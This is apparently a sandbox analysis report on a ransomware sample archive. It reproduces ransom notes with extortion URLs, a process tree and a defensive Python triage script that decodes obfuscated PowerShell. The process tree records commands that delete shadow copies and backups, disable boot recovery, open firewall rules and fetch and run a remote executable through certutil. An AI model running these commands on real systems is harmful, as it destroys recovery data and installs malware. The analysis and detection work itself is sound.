Analysis

  • max time kernel
    379s
  • max time network
    383s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    30-10-2024 21:38

General

  • Target

    RNSM00403.7z

  • Size

    60.6MB

  • MD5

    f61f92161d115bc21c47483258803ca7

  • SHA1

    56c8ce8f2a6104b40f1a88d1b42f083dad7a9de9

  • SHA256

    8aeb260c2e350147f992e73b8f6fedba94fd04d12e8a2ba3e4ec8500baa13830

  • SHA512

    25e5061c1ed6c457c7f46bad5f19b27369dc4409f40c02bc2f63e39d102aa54a1ed7532018ef8a8c3469e574daf1c6ba8160c24ea5efbeaa8f5b97dfc63fe173

  • SSDEEP

    1572864:xLROHSmpHJN4vOB7FHXhWZHEvM33yiUY92Y3FCC7m9tx3Yrr:NROySTWw+yvwita2E7+tx3YP

Malware Config

Extracted

Family

mespinoza

Attributes
  • ransomnote

    Hi Company, Every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data back contact us: [email protected] [email protected] -------------- FAQ: 1. Q: How can I make sure you don't fooling me? A: You can send us 2 files(max 2mb). 2. Q: What to do to get all data back? A: Don't restart the computer, don't move files and write us. 3. Q: What to tell my boss? A: Protect Your System Amigo.

Extracted

Path

F:\$RECYCLE.BIN\S-1-5-21-3227495264-2217614367-4027411560-1000\Readme.README

Ransom Note
Hi Company, Every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data back contact us: [email protected] [email protected] -------------- FAQ: 1. Q: How can I make sure you don't fooling me? A: You can send us 2 files(max 2mb). 2. Q: What to do to get all data back? A: Don't restart the computer, don't move files and write us. 3. Q: What to tell my boss? A: Protect Your System Amigo.

Extracted

Path

C:\Program Files (x86)\readme.txt

Family

conti

Ransom Note
All of your files are currently encrypted by CONTI strain. As you know (if you don't - just "google it"), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly. If you try to use any additional recovery software - the files might be damaged, so if you are willing to try - try it on the data of the lowest value. To make sure that we REALLY CAN get your data back - we offer you to decrypt 2 random files completely free of charge. You can contact our team directly for further instructions through our website : TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://m232fdxbfmbrcehbrj5iayknxnggf6niqfj6x4iedrgtab4qupzjlaid.onion HTTPS VERSION : https://contirecovery.info YOU SHOULD BE AWARE! Just in case, if you try to ignore us. We've downloaded a pack of your internal data and are ready to publish it on out news website if you do not respond. So it will be better for both sides if you contact us as soon as possible. ---BEGIN ID--- mEL9Y7SC22f1JfKAJi5NlYC2aVZ82ImX9nR568r2hXw9tn1weDwEc8s2r2thduYr ---END ID---
URLs

http://m232fdxbfmbrcehbrj5iayknxnggf6niqfj6x4iedrgtab4qupzjlaid.onion

https://contirecovery.info

Extracted

Path

C:\Recovery\README.d96d1f6d.TXT

Family

darkside

Ransom Note
----------- [ Welcome to Dark ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 100 GB data. Example of data: - Accounting data - Executive data - Sales data - Customer Support data - Marketing data - Quality data - And more other... Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To give you universal decrypting tool for all encrypted files. - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? 
---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68 When you open our website, put the following data in the input form: Key: pr9gzRnMz6qEwr6ovMT0cbjd9yT56NctfQZGIiVVLgo0ME2EQpAUyZucG9BLrOJjno5XLPvCN11TFfnlFHa42u5mJxoeR5k5RUgQAC1MC6LBUj4YOOAUyiBrR HQSUM3pzGoEPRVOzXSZ8YqkJyFL0TDFBbWaBKQDOSo9GzKKoVRQ0Eb02F5geTPkTAqZZSfSQ6PBBlTGPSgGe2kCyuwwp7lDmRSJlNnHssMMZHVhXzyZ6fxiBY gNiuusFK8JNI5nrtRPp3bMAc6OEddxfJWj6o2GT1Xg9j87Jp4Oyv43E1J61jLJAWBkmoBB3Gqv07mtyDW5PnmxBlNzABbLFEvJMQL23sR8nnw4svzcZHxrqD1 xRcxqyeKtsaQ5yqLvyQgMdnrI2QoCqkHYYUfBIzjO8BXyBZdmjHanXE57jdDAhjaDUUqfL917cCyJr1uwVR0Xj5lJXe8BIKHd3dFrz70CsIXFAhicOsBlFzIn daNcAXXyL8Fg1avIXOcuEkGRDXt8Cs8b3TAB6n4DrbLJdiFjECo8yCA9pxvzqjXatumUloblWFZaUoLVYzP !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC

http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68

Extracted

Path

C:\Program Files\Crashpad\attachments\Restore-My-Files.txt

Family

lockbit

Ransom Note
All your important files are encrypted! Any attempts to restore your files with the thrid-party software will be fatal for your files! RESTORE YOU DATA POSIBLE ONLY BUYING private key from us. There is only one way to get your files back: 1) Through a standard browser(FireFox, Chrome, Edge, Opera) | 1. Open link http://lockbit-decryptor.top/?8841DD9B0AC925FF9D181C92893BBBCE | 2. Follow the instructions on this page 2) Through a Tor Browser - recommended | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?8841DD9B0AC925FF9D181C92893BBBCE This link only works in Tor Browser! | 3. Follow the instructions on this page ### Attention! ### # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site # Do not rename encrypted files. # Do not try to decrypt using third party software, it may cause permanent data loss. # Decryption of your files with the help of third parties may cause increased price(they add their fee to our). # Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN. # Tor Browser user manual https://tb-manual.torproject.org/about
URLs

http://lockbit-decryptor.top/?8841DD9B0AC925FF9D181C92893BBBCE

http://lockbitks2tvnmwk.onion/?8841DD9B0AC925FF9D181C92893BBBCE

Signatures

  • Conti Ransomware

    Ransomware generally thought to be a successor to Ryuk.

  • Conti family
  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Darkside family
  • DemonWare

    Ransomware first seen in mid-2020.

  • Demonware family
  • GandCrab payload 2 IoCs
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

  • Gandcrab family
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba family
  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Lockbit family
  • Mespinoza Ransomware 2 TTPs

    Also known as Pysa. Ransomware-as-a-service which first appeared in 2020.

  • Mespinoza family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 3 IoCs
  • Renames multiple (1592) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (4445) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (5639) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (9854) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 31 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 54 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 31 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 64 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 20 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. In this run the netsh invocations shown under Processes add inbound firewall allow rules (netsh advfirewall firewall add rule); no helper DLL registration (netsh add helper) appears in the tree, so this hit reflects netsh execution rather than confirmed Netsh Helper DLL persistence.

  • Program crash 5 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

    Attempts to gather information about the victim's system language in order to infer the geographical location of the host.

  • Checks SCSI registry key(s) 3 TTPs 10 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 23 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.
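The recovery-inhibition, persistence and firewall signatures above all fire on process command lines, and one of the lines reproduced under Processes (powershell.exe, PID 5296) hides its payload in a hex-character loop that none of the usual keyword rules would catch. The following Python script is an added example written for this page; it is not part of the sandbox report or of any of the samples. It decodes that loop form and matches a constructed sample list of command lines copied from the Processes tree (PIDs as the sandbox assigned them) against a small rule set keyed to ATT&CK technique IDs. The rules and labels are our own assumptions for illustration, not the sandbox's signature logic.

```python
import re

# Hex-char loop of the form (0..N)|%{$s+=[char][byte]('0x'+'<hex>'.Substring(2*$_,2))}
# as seen in the powershell.exe command line (PID 5296) in this report.
HEX_LOOP = re.compile(
    r"\(0\.\.(\d+)\)\|%\{\$s\+=\[char\]\[byte\]\('0x'\+'([0-9A-Fa-f]+)'"
    r"\.Substring\(2\*\$_,2\)\)\}",
    re.IGNORECASE,
)

# Command-line patterns for behaviours the Signatures list reports.
# Technique labels are ATT&CK IDs chosen for this example (assumption).
_RULES = [
    ("T1490 Inhibit System Recovery", r"\bvssadmin(\.exe)?\s+delete\s+shadows\b"),
    ("T1490 Inhibit System Recovery", r"\bwmic(\.exe)?\s+shadowcopy\b.*\bdelete\b"),
    ("T1490 Inhibit System Recovery", r"\bWin32_Shadowcopy\b.*\.Delete\(\)"),
    ("T1490 Inhibit System Recovery",
     r"\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+"
     r"(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b"),
    ("T1490 Inhibit System Recovery", r"\bwbadmin(\.exe)?\s+delete\s+catalog\b"),
    ("T1547.001 Registry Run Key",
     r"\breg(\.exe)?\s+add\s+HK(CU|LM)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b"),
    ("T1053.005 Scheduled Task", r"\bschtasks(\.exe)?\s+/create\b"),
    ("T1562.004 Modify System Firewall",
     r"\bnetsh(\.exe)?\s+advfirewall\s+firewall\s+add\s+rule\b"),
    ("T1105 Ingress Tool Transfer", r"\bcertutil(\.exe)?\s+-urlcache\b"),
    ("T1059.001 PowerShell with iex", r"\bpowershell(\.exe)?\b.*\biex\b"),
]
RULES = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in _RULES]


def decode_hex_char_loop(cmdline):
    """Return the plaintext a (0..N) hex-char loop would build, or None."""
    m = HEX_LOOP.search(cmdline)
    if not m:
        return None
    last_index, hexstr = int(m.group(1)), m.group(2)
    if len(hexstr) % 2:
        return None
    # The loop runs indices 0..N inclusive, one 2-char hex pair each, so any
    # bytes beyond N+1 (here a trailing 0x20) are never appended to $s.
    return bytes.fromhex(hexstr)[: last_index + 1].decode("latin-1")


def classify(cmdline):
    """Unique technique labels whose pattern matches the command line, in rule order."""
    hits = []
    for technique, pattern in RULES:
        if pattern.search(cmdline) and technique not in hits:
            hits.append(technique)
    return hits


def triage(entries):
    """Decode obfuscated PowerShell, then classify raw and decoded text together."""
    results = []
    for pid, cmdline in entries:
        decoded = decode_hex_char_loop(cmdline)
        techniques = classify(cmdline)
        for t in classify(decoded or ""):
            if t not in techniques:
                techniques.append(t)
        results.append({"pid": pid, "cmdline": cmdline,
                        "decoded": decoded, "techniques": techniques})
    return results


# Constructed sample: command lines copied from the Processes tree of this report.
SAMPLE_CMDLINES = [
    (5296, 'powershell -ep bypass -c "(0..61)|%{$s+=[char][byte](\'0x\'+\''
           '4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20'
           '466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'
           '\'.Substring(2*$_,2))};iex $s"'),
    (6696, r'"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & '
           r'wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & '
           r'bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet'),
    (4008, r'''C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{59C6D001-2A1D-495D-B41C-13CF70E22926}'" delete'''),
    (2636, r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v UpdateHandler '
           r'/d "wscript "C:\Updates\h.vbs" "C:\Updates\Exec.bat""'),
    (6320, r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe '
           r'-urlcache -split -f https://babsitef.com/app/app.exe '
           r'C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && '
           r'C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F'),
    (8584, r'netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow '
           r'program="C:\Users\Admin\AppData\Roaming\86ddda386cc8\86ddda386cc8.exe" enable=yes'),
    (7752, r'C:\Windows\Sysnative\bcdedit.exe /v'),
    (1312, r'"C:\Windows\system32\taskmgr.exe" /4'),
]

if __name__ == "__main__":
    for r in triage(SAMPLE_CMDLINES):
        print(r["pid"], r["techniques"] or "-")
        if r["decoded"]:
            print("    decoded:", r["decoded"])
```

Running it recovers the pipeline `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}` for PID 5296 and flags it as recovery inhibition even though the raw line contains none of the usual keywords. Note that `bcdedit.exe /v` (PID 7752) only lists boot entries and matches nothing here; the report's "Modifies boot configuration data using bcdedit" hit on that process reflects bcdedit execution rather than a confirmed change, so weight it lower than the two `/set {default}` calls under PID 6696.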

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00403.7z"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2784
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1312
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /1
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:4572
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2592
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4956
      • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-86321c281edaeefe2a34647a20cdba5fd5479fcfb81e57fdce5158e6836a33a8.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        PID:648
        • C:\Users\Admin\AppData\Roaming\backup.exe
          "C:\Users\Admin\AppData\Roaming\backup.exe"
          4⤵
          • Executes dropped EXE
          PID:5444
      • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe
        HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4728
        • C:\Windows\SysWOW64\wscript.exe
          "C:\Windows\System32\wscript.exe" "C:\Updates\h.vbs" "C:\Updates\ZTH.bat"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5024
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Updates\ZTH.bat" "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:844
            • C:\Windows\SysWOW64\reg.exe
              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v UpdateHandler /d "wscript "C:\Updates\h.vbs" "C:\Updates\Exec.bat""
              6⤵
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:2636
      • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe
        HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1824
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 1612
          4⤵
          • Program crash
          PID:7040
      • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe
        HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2116
        • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe
          "C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • System Location Discovery: System Language Discovery
          PID:2984
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\86ddda386cc8\86ddda386cc8.exe" enable=yes"
            5⤵
              PID:7388
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\86ddda386cc8\86ddda386cc8.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                PID:8584
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              5⤵
                PID:2444
                • C:\Windows\system32\netsh.exe
                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                  6⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:2408
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe ""
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Modifies data under HKEY_USERS
                PID:8636
                • C:\Windows\SYSTEM32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:8932
                • C:\Windows\SYSTEM32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://babsitef.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                  6⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:6320
                • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                  "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:7868
                • C:\Windows\system32\bcdedit.exe
                  C:\Windows\Sysnative\bcdedit.exe /v
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:7752
          • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe
            HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe
            3⤵
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2080
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{59C6D001-2A1D-495D-B41C-13CF70E22926}'" delete
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3440
              • C:\Windows\System32\wbem\WMIC.exe
                C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{59C6D001-2A1D-495D-B41C-13CF70E22926}'" delete
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4008
          • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe
            HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            PID:3128
          • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe
            HEUR-Trojan-Ransom.Win32.Foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe
            3⤵
            • Executes dropped EXE
            • Adds Run key to start application
            PID:1056
          • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe
            HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3448
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 488
              4⤵
              • Program crash
              PID:2448
          • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe
            HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: RenamesItself
            • System policy modification
            PID:2792
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\update.bat" "
              4⤵
              • System Location Discovery: System Language Discovery
              PID:5076
          • C:\Users\Admin\Desktop\00403\HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe
            HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops desktop.ini file(s)
            • Enumerates connected drives
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            PID:3088
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              4⤵
                PID:6696
                • C:\Windows\system32\vssadmin.exe
                  vssadmin delete shadows /all /quiet
                  5⤵
                  • Interacts with shadow copies
                  PID:6872
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic shadowcopy delete
                  5⤵
                    PID:2184
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} bootstatuspolicy ignoreallfailures
                    5⤵
                    • Modifies boot configuration data using bcdedit
                    PID:5540
                  • C:\Windows\system32\bcdedit.exe
                    bcdedit /set {default} recoveryenabled no
                    5⤵
                    • Modifies boot configuration data using bcdedit
                    PID:3656
                  • C:\Windows\system32\wbadmin.exe
                    wbadmin delete catalog -quiet
                    5⤵
                    • Deletes backup catalog
                    PID:7444
              • C:\Users\Admin\Desktop\00403\Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe
                Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe
                3⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Writes to the Master Boot Record (MBR)
                • Suspicious use of NtSetInformationThreadHideFromDebugger
